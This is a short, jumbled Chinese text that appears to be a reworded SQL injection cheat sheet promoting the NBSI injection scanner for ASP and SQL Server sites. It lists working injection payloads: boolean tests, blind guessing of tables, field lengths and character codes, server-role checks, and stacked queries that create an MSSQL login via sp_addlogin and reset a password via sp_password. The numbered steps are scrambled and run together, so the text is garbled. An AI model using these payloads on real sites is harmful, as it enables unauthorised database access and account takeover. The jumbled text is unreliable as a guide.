username;--11.加上mssql和体系的账号;exec master.dbo.sp_addlogin username;--;and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--3.分辨数据库系统软件;and (select count(*) from sysobjects)0 mssql
猜数据库;and (Select Count(*) from [数据库名])08.猜字段中纪录长短;and (select top 1 len(字段名) from 数据库名)0NBSI注入漏洞检测工具NBSI详细介绍1.分辨是不是有注入;and 1=1
;and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--9.(1)猜字段的ascii值(access);and (select top 1 asc(mid(字段名,1,1)) from 数据库名)0NBSI注入网站漏洞扫描专用工具是一款功能齐全的APP,由vb语言撰写的网站漏洞检测专用工具的名字,ASP注入网站漏洞扫描专用工具,尤其在sql server注入检验层面有较高的准确度。;exec master.dbo.sp_password null。